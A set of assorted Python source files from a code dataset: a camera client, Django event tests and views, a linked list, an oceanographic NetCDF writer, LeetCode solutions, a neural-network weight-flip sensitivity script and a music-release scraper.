subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n shell=False,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n time.sleep(1) # wait one second so the camlive can launch a server\n\n\ndef signal_handler(signal, frame):\n killOnCam(addressSocket)\n sys.exit(0)\n\n\n##\n# @brief Main function\n##\nif __name__ == '__main__':\n # Parsing arguments\n parser = OptionParser()\n parser.add_option(\"-a\", \"--address\", help=\"address of camlight to display. Default = 6 (172.16.100.46)\")\n parser.add_option(\"-f\", \"--fulladdress\", help=\"full address of camlight to display. Default = 172.16.100.46\")\n parser.add_option(\"-r\", \"--run\", help=\"Automatically run the camlive. By default 1. 
Set to 0 to deactivate.\")\n (options, args) = parser.parse_args()\n\n baseAddressSocket = '172.16.100.4'\n addressSocket = baseAddressSocket + '6' # by default camera '172.16.100.46'\n\n if options.address is not None:\n addressSocket = baseAddressSocket + options.address\n if options.fulladdress is not None:\n addressSocket = options.fulladdress\n\n # Ctrl+c handler\n signal.signal(signal.SIGINT, signal_handler)\n\n # Command to run via ssh\n if options.run is None or options.run == '1':\n runOnCam(addressSocket)\n\n getImage(addressSocket)\n","sub_path":"camlive/client/camLivePy.py","file_name":"camLivePy.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"407957182","text":"import unittest\nfrom datetime import datetime\n\nfrom django.template.defaultfilters import slugify\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone\n\nfrom freezegun import freeze_time\n\nfrom .models import Event\nfrom .models import Performance\nfrom .models import ReoccurringEventType\nfrom core.utils import CalendarWeek\nfrom core.utils import EST\n\n\nclass EventDateTimeMethodsTC(TestCase):\n def setUp(self):\n self.e = Event.objects.create(name='TestEvent')\n\n self.p1 = Performance.objects.create(\n event=self.e,\n name='First Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n self.p2 = Performance.objects.create(\n event=self.e,\n name='Second Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 45, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 15, 0, tzinfo=EST)\n )\n\n self.p3 = Performance.objects.create(\n event=None,\n name='Performace not in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n def test_event_start_dt_is_first_peformance_start_dt(self):\n self.assertEqual(Performance.objects.count(), 3)\n self.assertEqual(self.e.start_dt, self.p1.start_dt)\n\n def test_event_end_dt_is_last_peformance_end_dt(self):\n self.assertEqual(self.e.end_dt, self.p2.end_dt)\n\n def test_event_start_dt_overrides_performance_dt(self):\n dt = datetime(2013, 1, 17, 21, 45, 0, tzinfo=EST)\n self.e._start_dt = dt\n self.assertEqual(self.e.start_dt, dt)\n\n def test_event_end_dt_overrides_performance_dt(self):\n dt = datetime(2013, 1, 17, 22, 40, 0, tzinfo=EST)\n self.e._end_dt = dt\n self.assertEqual(self.e.end_dt, dt)\n\n\nclass EventPerformanceRelationTC(TestCase):\n def setUp(self):\n self.e = Event.objects.create(name='TestEvent')\n\n self.p1 = Performance.objects.create(\n event=self.e,\n name='First Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n self.p2 = Performance.objects.create(\n event=self.e,\n name='Second Performace in Event',\n start_dt=datetime(2013, 1, 17, 19, 45, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 15, 0, tzinfo=EST)\n )\n\n self.p3 = Performance.objects.create(\n event=None,\n name='Performace not in Event',\n start_dt=datetime(2013, 1, 17, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 17, 20, 0, 0, tzinfo=EST)\n )\n\n def test_event_contains_correct_performances(self):\n self.assertIn(self.p1, self.e.performance_set.all())\n self.assertIn(self.p2, self.e.performance_set.all())\n self.assertNotIn(self.p3, self.e.performance_set.all())\n\n def 
test_iterability_of_event(self):\n expected = [self.p1, self.p2]\n result = [p for p in self.e]\n self.assertEqual(expected, result)\n\n\nclass EventsPerformacesWeekPassedToTemplateTC(TestCase):\n \"\"\"\n Assert that correct event and performances objects are handed to\n template for rendering.\n \"\"\"\n def setUp(self):\n \"\"\"\n Set up events and performances for next several weeks\n \"\"\"\n self.cal_week = CalendarWeek()\n\n # Week of Monday, 2012-12-10 - One Event, Winter Ball\n self.e1 = Event.objects.create(\n name='QSIC Winter Ball',\n description='A night of fun!',\n _start_dt=datetime(2012, 12, 15, 21, 0, 0, tzinfo=EST),\n _end_dt=datetime(2012, 12, 16, 2, 0, 0, tzinfo=EST),\n _price=15.00\n )\n\n # Week of Monday, 2012-12-17 - One event with two performances\n self.e2 = Event.objects.create(name='QSIC House Night', description='A night of fun!')\n self.p1 = Performance.objects.create(\n event=self.e2,\n name='Peace Love and Joy',\n start_dt=datetime(2012, 12, 21, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p2 = Performance.objects.create(\n event=self.e2,\n name=\"Rockin' Rolla Music\",\n start_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 30, 0, tzinfo=EST),\n price=5.00\n )\n\n # Week of Monday, 2012-12-24 - Dark\n\n # Week of Monday, 2012-12-31 - No events, 3 performances\n self.p3 = Performance.objects.create(\n event=self.e2,\n name='Suzie Q & The Team',\n start_dt=datetime(2013, 1, 2, 20, 15, 0, tzinfo=EST),\n end_dt=datetime(2013, 1, 2, 23, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p4 = Performance.objects.create(\n event=self.e2,\n name='Magic Man, The',\n start_dt=datetime(2013, 1, 4, 19, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 4, 21, 15, 0, tzinfo=EST),\n price=5.00\n )\n self.p5 = Performance.objects.create(\n event=self.e2,\n name='Marty Loves Pizza',\n start_dt=datetime(2013, 1, 5, 12, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 5, 16, 0, 0, tzinfo=EST),\n price=5.00\n )\n\n # Week of Monday, 2013-01-07 - 1 events, 2 performances in event, 1 not in event\n self.e3 = Event.objects.create(name='Happy Fun Time', description='Lalalalalal')\n self.p6 = Performance.objects.create(\n event=self.e3,\n name='Skiddss',\n start_dt=datetime(2013, 1, 11, 15, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 17, 0, 0, tzinfo=EST),\n price=23.00\n )\n self.p7 = Performance.objects.create(\n event=self.e3,\n name='Lolipops',\n start_dt=datetime(2013, 1, 11, 17, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 19, 0, 0, tzinfo=EST),\n price=34.00\n )\n self.p8 = Performance.objects.create(\n name='Madness!',\n start_dt=datetime(2013, 1, 11, 20, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 1, 11, 22, 0, 0, tzinfo=EST),\n price=15.00\n )\n\n def get_local_context(self, response):\n self.assertTrue(hasattr(response, 'context'))\n context = response.context\n return {'events': context['events'], 'performances': context['performances']}\n\n def test_no_performaces_or_events_for_dark_week(self):\n response = self.client.get('/events/week/20121224', follow=True)\n local_context = self.get_local_context(response)\n # Assert no events\n self.assertEqual(local_context['events'], [])\n # Assert no Performances\n self.assertEqual([p for p in local_context['performances']], [])\n\n def test_performances_no_events(self):\n response = self.client.get('/events/week/20121231', follow=True)\n local_context = self.get_local_context(response)\n # Assert no events\n 
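# (Editor's note, not part of the original test file: `local_context` above is the\n        # {'events': ..., 'performances': ...} dict that get_local_context() pulls out of\n        # response.context; for the week of Monday 2012-12-31 the view under test is\n        # expected to hand back an empty event list even though three Performance rows\n        # (p3, p4, p5) fall inside that week, as the assertions below check.)\n        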
self.assertEqual(local_context['events'], [])\n # 3 Performances\n self.assertEqual(local_context['performances'].count(), 3)\n\n def test_no_non_event_performances_one_event(self):\n response = self.client.get('/events/week/20121217', follow=True)\n local_context = self.get_local_context(response)\n # Assert 1 event\n self.assertEqual(len([e for e in local_context['events']]), 1)\n # No Performances\n self.assertEqual(local_context['performances'].count(), 0)\n\n def test_events_and_non_event_performances(self):\n response = self.client.get('/events/week/20130107', follow=True)\n local_context = self.get_local_context(response)\n # Assert 1 event\n events = [e for e in local_context['events']]\n self.assertEqual(len(events), 1)\n event_performances = [p for p in events[0]]\n # 2 Event Performances\n self.assertEqual(len(event_performances), 2)\n # 1 Non Event Performance\n self.assertEqual(local_context['performances'].count(), 1)\n\n\n# \"2012-12-12 00:00:00\" is a Wednesday\n# 15th is a Saturday\n@freeze_time(\"2012-12-12 00:00:00\", tz_offset=-4)\nclass EventsPerformacesDetailViewContextPassedToTemplateTC(TestCase):\n \"\"\"\n Assert that correct event and performance objects are handed to\n template for rendering.\n \"\"\"\n def setUp(self):\n \"\"\"\n Set up an event and some performances.\n \"\"\"\n self.cal_week = CalendarWeek()\n\n # Week of Monday, 2012-12-17 - One event with two performances\n self.e1 = Event.objects.create(name='QSIC House Night', description='A night of fun!')\n self.p1 = Performance.objects.create(\n event=self.e1,\n name='Peace Love and Joy',\n start_dt=datetime(2012, 12, 21, 19, 30, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n price=5.00\n )\n self.p2 = Performance.objects.create(\n event=self.e1,\n name=\"Rockin' Rolla Music\",\n start_dt=datetime(2012, 12, 21, 20, 0, 0, tzinfo=EST),\n end_dt=datetime(2012, 12, 21, 20, 30, 0, tzinfo=EST),\n price=5.00\n )\n\n def test_event_in_context(self):\n response = self.client.get('/events/event/' + str(self.e1.id), follow=True)\n self.assertTrue(hasattr(response, 'context_data'))\n local_context = response.context_data\n self.assertEqual(local_context['event'], self.e1)\n\n def test_performance_in_context_no_event(self):\n response = self.client.get('/events/performance/' + str(self.p1.id), follow=True)\n self.assertTrue(hasattr(response, 'context_data'))\n local_context = response.context_data\n self.assertEqual(local_context['performance'], self.p1)\n self.assertFalse(hasattr(local_context, 'event'))\n\n\nclass SlugTC(TestCase):\n \"\"\"\n A test case for all slug related tests.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n cls.start_dt = datetime.now().replace(tzinfo=EST)\n cls.end_dt = datetime.now().replace(tzinfo=EST)\n\n def test_save_event_generates_correct_slug(self):\n e = Event.objects.create(name='QSIC House Night')\n self.assertEqual(e.slug, 'qsic-house-night')\n\n def test_save_performance_generates_correct_slug(self):\n p = Performance.objects.create(name='Butter High!',\n start_dt=self.start_dt,\n end_dt=self.end_dt)\n self.assertEqual(p.slug, 'butter-high')\n\n def test_get_event_detail_view_redirects_to_view_with_slug(self):\n e = Event.objects.create(name='QSIC House Night')\n response = self.client.get('/events/event/' + str(e.id), follow=True)\n self.assertTrue(hasattr(response, 'request'))\n self.assertEqual(response.request['PATH_INFO'], e.url)\n\n def test_get_performance_detail_view_redirects_to_view_with_slug(self):\n p = 
Performance.objects.create(name='Butter High!',\n start_dt=self.start_dt,\n end_dt=self.end_dt)\n response = self.client.get('/events/performance/' + str(p.id), follow=True)\n self.assertTrue(hasattr(response, 'request'))\n self.assertEqual(response.request['PATH_INFO'], p.url)\n\n\nclass ReoccuringEventsTC(TestCase):\n def test_build_reoccuring_events(self):\n event_start_time = datetime(2014, 6, 20, 19, 30, 0, tzinfo=EST)\n event_end_time = datetime(2014, 6, 20, 22, 30, 0, tzinfo=EST)\n ret = ReoccurringEventType.objects.create(name='Test events', period=7)\n e = Event.objects.create(name='TestEvent',\n description='Lots of fun here',\n reoccurring_event_type=ret,\n _start_dt=event_start_time,\n _end_dt=event_end_time)\n self.assertEqual(Event.objects.count(), 1)\n # go to up-next page 8 days prior to event's start date\n with freeze_time('2014-06-12 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n self.assertEqual(Event.objects.count(), 1)\n # go to page 4 days prior to event's start date\n with freeze_time('2014-06-16 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n e_qs = Event.objects.order_by('-_start_dt')\n self.assertEqual(e_qs.count(), 2)\n self.assertEqual(e_qs.first().start_dt, e.start_dt + timezone.timedelta(days=7))\n # go to page 2 days after event's start date\n with freeze_time('2014-06-22 00:00:00', tz_offset=-4):\n self.client.get(reverse('events:up_next'), follow=True)\n self.assertEqual(Event.objects.count(), 3)\n e_qs = Event.objects.order_by('-_start_dt')\n self.assertEqual(e_qs.first().start_dt, e.start_dt + timezone.timedelta(days=14))","sub_path":"events/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327571201","text":"\"\"\"\n This is a most basic singly linked list with key and value\n\"\"\"\n\n\nclass LinkNode:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.next = None\n\n\nclass LinkList:\n def __init__(self, key, val):\n self.list = LinkNode(key, val)\n\n def add_node(self, key, val):\n self.list.next = LinkNode(key, val)\n\n def add_node_front(self, key, val):\n new_head = LinkNode(key, val)\n cur_head = self.list\n new_head.next = cur_head\n self.list = new_head\n\n def remove_node(self, key):\n if self.list.key == key:\n self.list = self.list.next\n else:\n while self.list.next is not None:\n if key == self.list.next.key:\n self.list.next = self.list.next.next\n break\n\n def traverse(self):\n while self.list is not None:\n print('|key:{} value:{}|'.format(self.list.key, self.list.val))\n self.list = self.list.next\n\n\nif __name__ == '__main__':\n linked_list = LinkList(key=1, val=1)\n linked_list.add_node(key=2, val=2)\n linked_list.add_node_front(key=3, val=3)\n linked_list.traverse()\n","sub_path":"data-structures/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40995962","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom visualizer.models import User, Spreadsheet\nfrom visualizer.forms import EmailUserCreationForm, SpreadsheetForm\n\n\ndef index(request):\n return render(request, 
\"index.html\")\n\n\ndef about(request):\n return render(request, \"about.html\")\n\n\ndef signup(request):\n if request.method == 'POST':\n form = EmailUserCreationForm(request.POST)\n if form.is_valid():\n username = request.POST['username']\n password = request.POST['password1']\n user = form.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect(\"main_area\")\n else:\n form = EmailUserCreationForm()\n return render(request, \"registration/signup.html\", {'form': form})\n\n@login_required()\ndef main_area(request):\n if request.method == 'POST':\n form = SpreadsheetForm(request.POST, request.FILES)\n if form.is_valid():\n nme = form.cleaned_data['name']\n descrip = form.cleaned_data['description']\n sheet = form.cleaned_data['file']\n # need to call raw data function on sheet\n # need to call normalized data function on sheet\n usr = request.user\n spreadsheet = Spreadsheet(name=nme, description=descrip, file=sheet, user=usr) # store raw & normal data\n spreadsheet.save()\n return HttpResponseRedirect('/results/')\n else:\n form = SpreadsheetForm()\n return render(request, \"main_area.html\", {'form': form})\n\n\n@login_required()\ndef results(request):\n return render(request, \"results.html\")\n\n@login_required()\ndef settings(request):\n return render(request, \"settings.html\")\n\n@login_required()\ndef logout(request):\n logout(request)","sub_path":"visualizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582610183","text":"import math\n\ndef firstFunction(name):\n letters = len(name)\n firstLetter = name[0]\n return (letters, firstLetter)\n\ndef decimalPlaces(num, dec):\n return round(num, dec)\n\nif __name__ == \"__main__\":\n # inp = input()\n # integ, strin= firstFunction(inp)\n print (decimalPlaces(21.23456, 3))\n # print (integ, \"\\t\", strin)\n print (math.ceil(1.00001))\n print (\"gdjhgdhj*jgdhjgd bjhdmbduy gjgdjgdjy\".split(\"*\"))\n # l = [1,2,3]\n # print (list(map(float, l)))\n slt = list(map(int, input().split(\" \")))\n print (slt)","sub_path":"learning/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279993616","text":"from ios_data_transform.OceanNcFile import MCtdNcFile\nfrom ios_data_transform.OceanNcVar import OceanNcVar\nfrom ios_data_transform.utils.utils import is_in, find_geographic_area, read_geojson\nfrom datetime import datetime\nfrom pytz import timezone\n\n\ndef write_bcsop_ncfile(filename, profile_id, sopdf, status):\n '''\n use data from pandas dataframe sopdf to write the data into a netcdf file\n author: Pramod Thupaki pramod.thupaki@hakai.org\n inputs:\n filename: output file name to be created in netcdf format\n sopdf: pandas dataframe with BCSOP data\n output:\n NONE\n '''\n out = MCtdNcFile()\n # write global attributes\n out.featureType = 'timeSeries'\n out.summary = 'The dataset consists of 12 coastal stations that have been monitored for several decades, the earliest commencing in 1914. 
There are gaps in the daily data due to weather conditions being too dangerous for sampling'\n out.title = 'BC Lightstation data'\n out.institution = 'Institute of Ocean Sciences, 9860 West Saanich Road, Sidney, B.C., Canada'\n out.infoUrl = 'https://open.canada.ca/data/en/dataset/719955f2-bf8e-44f7-bc26-6bd623e82884'\n out.cdm_profile_variables = 'time' \n # write full original header, as json dictionary\n out.description = open('header.txt').readlines()\n # initcreate dimension variable\n out.nrec = int(len(sopdf.index))\n ncfile_var_list = []\n ncfile_var_list.append(OceanNcVar('str_id', 'country', None, None, None, 'Canada'))\n ncfile_var_list.append(OceanNcVar('str_id', 'project', None, None, None, 'British Columbia Shore station Observation Program (BCSOP)'))\n ncfile_var_list.append(OceanNcVar('str_id', 'contact_name', None, None, None, 'Peter Chandler'))\n ncfile_var_list.append(OceanNcVar('str_id', 'contact_email',None, None, None, 'peter.chandler@dfo-mpo.gc.ca'))\n ncfile_var_list.append(OceanNcVar('str_id', 'agency', None, None, None, 'Fisheries and Oceans Canada'))\n ncfile_var_list.append(OceanNcVar('str_id', 'instrument_type', None, None, None, 'Given this is a multi-decade time series the sampling instruments have changed over time. At present measurements are made with a YSI Pro30 multimeter.'))\n ncfile_var_list.append(OceanNcVar('lat', 'latitude', 'degrees_north', None, None, sopdf['latitude'].values[0]))\n ncfile_var_list.append(OceanNcVar('lon', 'longitude', 'degrees_east', None, None, sopdf['longitude'].values[0]))\n ncfile_var_list.append(OceanNcVar('profile', 'profile', None, None, None, profile_id))\n ncfile_var_list.append(OceanNcVar('str_id', 'status', None, None, None, status))\n try:\n obs_time = [datetime.strptime(d, \"%m/%d/%Y\") for d in sopdf['date'].values]\n except:\n obs_time = [datetime.strptime(d, \"%Y-%m-%d\") for d in sopdf['date'].values]\n obs_time_utc = [timezone('UTC').localize(date_obj) for date_obj in obs_time]\n ncfile_var_list.append(OceanNcVar('time', 'time', None, None, None, obs_time_utc, vardim=('time')))\n # go through channels and add each variable depending on type\n null_value = float('NaN')\n # add temperature variable \n ncfile_var_list.append(OceanNcVar('temperature', 'TEMPTC01',\n 'deg C', sopdf['temperature'].min,\n sopdf['temperature'].max, sopdf['temperature'].values, ncfile_var_list,\n ('time'), null_value, conv_to_BODC=False))\n # add salinity variable\n ncfile_var_list.append(OceanNcVar('salinity', 'PSALPR01',\n 'PSS-78', sopdf['salinity'].min,\n sopdf['salinity'].max, sopdf['salinity'].values, ncfile_var_list,\n ('time'), null_value, conv_to_BODC=False))\n # attach variables to ncfileclass and call method to write netcdf file\n out.varlist = ncfile_var_list\n out.write_ncfile(filename)\n print(\"Finished writing file:\", filename)\n return 1\n","sub_path":"projects/bc_lightstation/bcsop_utils/write_bcsop_ncfile.py","file_name":"write_bcsop_ncfile.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456350027","text":"\"\"\"\nGiven the root of a binary tree, return the average value of the nodes \non each level in the form of an array. 
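For example, given root = [3,9,20,None,None,15,7] (the same tree that the creatBTree \ncall at the bottom of this file builds), the expected output is [3.0, 14.5, 11.0]: \nlevel 0 averages 3, level 1 averages (9+20)/2 and level 2 averages (15+7)/2. 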
Answers within 10^-5 of the actual \nanswer will be accepted.\n\n\"\"\"\n\nfrom typing import List\nfrom typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\ndef creatBTree(data, index):\n    pNode = None\n    if index < len(data):\n        if data[index] == None:\n            return\n        pNode = TreeNode(data[index])\n        pNode.left = creatBTree(data, 2 * index + 1) # [1, 3, 7, 15, ...]\n        pNode.right = creatBTree(data, 2 * index + 2) # [2, 5, 12, 25, ...]\n    return pNode \n\nclass Solution:\n    def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n        \n        sumByLevel = {}\n        numberOfNodesPerLevel = {}\n\n        def sumLevel(node, level):\n            if node == None:\n                return\n            # update our counts\n            sumByLevel[level] = sumByLevel.get(level,0) + node.val\n            numberOfNodesPerLevel[level] = numberOfNodesPerLevel.get(level,0)+1\n\n            sumLevel(node.left, level+1)\n            sumLevel(node.right, level+1)\n\n        sumLevel(root, 0)\n\n        result = []\n        for i in range(len(sumByLevel)):\n            avg = sumByLevel[i] / numberOfNodesPerLevel[i]\n            result.append(avg)\n\n        return result\n\n\ns = Solution()\nbtree = creatBTree([3,9,20,None,None,15,7],0)\nanswer = s.averageOfLevels(btree)\nprint(answer)\n","sub_path":"leetcode/637_avg_of_levels_in_btree/avg.py","file_name":"avg.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"357884154","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport torch\nimport argparse\nimport data\nimport util\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom models import nin\nfrom torch.autograd import Variable\nimport tqdm\nimport time\nimport numpy as np\n\ndef Dict2File(Dict, filename):\n    F = open(filename, 'w+')\n    F.write(str(Dict))\n    F.close()\n\ndef test(i, key, shape, rand = False, randFactor = 256):\n    global best_acc\n    test_loss = 0\n    correct = 0\n    if (not rand) or (len(shape) != 4):\n        model = nin.Net()\n        pretrained_model = torch.load(args.pretrained)\n        best_acc = pretrained_model['best_acc']\n        model.load_state_dict(pretrained_model['state_dict'])\n        model.to(device)\n        bin_op = util.BinOp(model)\n        model.eval()\n        bin_op.binarization()\n        state_dict = model.state_dict()\n    \n\n    if len(shape) == 4:\n        size1 = shape[1]\n        size2 = shape[2]\n        size3 = shape[3]\n        if rand:\n            if (int(i/(size2*size3))%int(size1)) == torch.randint(0,size1-1,[1]):\n                model = nin.Net()\n                pretrained_model = torch.load(args.pretrained)\n                model.load_state_dict(pretrained_model['state_dict'])\n                model.to(device)\n                bin_op = util.BinOp(model)\n                model.eval()\n                bin_op.binarization()\n                state_dict = model.state_dict()\n                (state_dict[key][int(i/size1/size2/size3)][int(i/size2/size3%size1)][int(i/size3%size2)][int(i%size3)]).mul_(-1)\n            else:\n                return 100\n        else:\n            (state_dict[key][int(i/size1/size2/size3)][int(i/size2/size3%size1)][int(i/size3%size2)][int(i%size3)]).mul_(-1)\n\n    if len(shape) == 1:\n        state_dict[key][i].mul_(-1)\n\n    if len(shape) == 2:\n        size = state_dict[key].shape[1]\n        (state_dict[key][int(i/size)][i%size]).mul_(-1)\n    \n    with torch.no_grad():\n        for data, target in testloader:\n            data, target = Variable(data.to(device)), Variable(target.to(device))\n\n            output = model(data)\n            test_loss += criterion(output, target).data.item()\n            pred = output.data.max(1, keepdim=True)[1]\n            correct += 
pred.eq(target.data.view_as(pred)).cpu().sum()\n bin_op.restore()\n acc = 100. * float(correct) / len(testloader.dataset)\n return acc\n\n\nif __name__=='__main__':\n # prepare the options\n parser = argparse.ArgumentParser()\n parser.add_argument('--cpu', action='store_true',\n help='set if only CPU is available')\n parser.add_argument('--data', action='store', default='./data/',\n help='dataset path')\n parser.add_argument('--arch', action='store', default='nin',\n help='the architecture for the network: nin')\n parser.add_argument('--lr', action='store', default='0.01',\n help='the intial learning rate')\n parser.add_argument('--pretrained', action='store', default='nin.best.pth.tar',\n help='the path to the pretrained model')\n parser.add_argument('--evaluate', action='store_true', default=True,\n help='evaluate the model')\n parser.add_argument('--verbose', action='store_true', default=False,\n help='display more information')\n parser.add_argument('--device', action='store', default='cuda:0',\n help='input the device you want to use')\n args = parser.parse_args()\n if args.verbose:\n print('==> Options:',args)\n \n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\n # set the seed\n torch.manual_seed(1)\n torch.cuda.manual_seed(1)\n\n # prepare the data\n if not os.path.isfile(args.data+'/train_data'):\n # check the data path\n raise Exception\\\n ('Please assign the correct data path with --data ')\n\n testset = data.dataset(root=args.data, train=False)\n testloader = torch.utils.data.DataLoader(testset, batch_size=512,\n shuffle=False, num_workers=4)\n\n # define classes\n classes = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n # define the model\n if args.verbose:\n print('==> building model',args.arch,'...')\n if args.arch == 'nin':\n model = nin.Net()\n else:\n raise Exception(args.arch+' is currently not supported')\n\n # initialize the model\n if not args.pretrained:\n if args.verbose:\n print('==> Initializing model parameters ...')\n best_acc = 0\n for m in model.modules():\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.05)\n m.bias.data.zero_()\n else:\n if args.verbose:\n print('==> Load pretrained model form', args.pretrained, '...')\n pretrained_model = torch.load(args.pretrained)\n best_acc = pretrained_model['best_acc']\n model.load_state_dict(pretrained_model['state_dict'])\n\n if not args.cpu:\n model.to(device)\n #model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n if args.verbose:\n print(model)\n\n # define solver and criterion\n base_lr = float(args.lr)\n param_dict = dict(model.named_parameters())\n params = []\n\n for key, value in param_dict.items():\n params += [{'params':[value], 'lr': base_lr,\n 'weight_decay':0.00001}]\n\n optimizer = optim.Adam(params, lr=0.10,weight_decay=0.00001)\n criterion = nn.CrossEntropyLoss()\n\n # define the binarization operator\n bin_op = util.BinOp(model)\n happy = model.state_dict()\n\n # do the evaluation if specified\n if args.evaluate:\n rand = False\n count = 0\n tLoss = 0\n lMax = 0\n lAvg = 0\n bestAcc = 86.28\n save = []\n\n find_key = \"13.weight\"\n print(find_key)\n state_dict = model.state_dict()\n \n for key in state_dict.keys():\n if key.find(find_key) != -1:\n total = 1\n shape = state_dict[key].shape\n use_key = key\n for t in range(len(state_dict[key].shape)):\n total *= state_dict[key].shape[t] \n \n with tqdm.tqdm(range(total)) as Loader:\n start = time.time()\n for i in Loader:\n acc = test(i, 
use_key, shape = shape, rand = rand)\n                    loss = bestAcc - acc\n                    \n                    if (acc != 100):\n                        count += 1\n                        tLoss += loss\n                        lAvg = tLoss / float(count)  # include the current loss before averaging\n                        save.append((i,loss))\n                        Loader.set_description(\"Av: %.2f%%, M: %.2f%%\"%(lAvg, lMax))\n                    \n                    if (loss > lMax):\n                        lMax = loss\n\n                    end = time.time()\n                    if (end - start > 300):\n                        np.save(find_key+'_tmp',save)\n                        start = end\n\n            np.save(find_key+'.neg', save)\n            print (\"lAvg = %f%%, Max = %f%%\"%(lAvg, lMax))\n            exit()\n","sub_path":"CIFAR_10/BI.py","file_name":"BI.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"356790940","text":"class Solution:\n    def replaceElements(self, arr: List[int]) -> List[int]:\n        max_val = -1\n        output_arr = [0]*len(arr)\n        output_arr[len(arr)-1]=max_val\n        for i in range(len(arr)-2, -1, -1):\n            if arr[i+1]>max_val:\n                output_arr[i]=arr[i+1]\n                max_val = arr[i+1]\n            else:\n                output_arr[i]=max_val \n        return output_arr\n","sub_path":"LeetCode/replace-elements-with-greatest-element-on-right-side.py","file_name":"replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"567832346","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_new_songs(url):\n    # looking at HTML structure of everynoise new releases page\n    home_url = url\n    res = requests.get(home_url)\n    soup = BeautifulSoup(res.content, 'lxml')\n\n    # finding all rows with artist and song name with uris\n    album_row = soup.find_all('div', attrs = {\"class\": \"albumrow\"})\n\n    # creating a list of dictionaries to create a DataFrame\n    tracks = []\n    for i in range(len(album_row)):\n        if len(album_row[i].find_all('span', attrs = {\"class\": \"trackcount\"})) == 0:\n            indiv_track = [{'artist_uri': album_row[i].find_all('a')[0]['href'],\n                            'artist': album_row[i].find_all('a')[0].find_all('b')[0].text,\n                            'track_uri': album_row[i].find_all('span')[0]['trackid'],\n                            'track_name': album_row[i].find_all('a')[1].text}]\n            tracks += indiv_track\n    tracks = pd.DataFrame(tracks)\n    return tracks\n","sub_path":"code/everynoise/everynoise.py","file_name":"everynoise.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
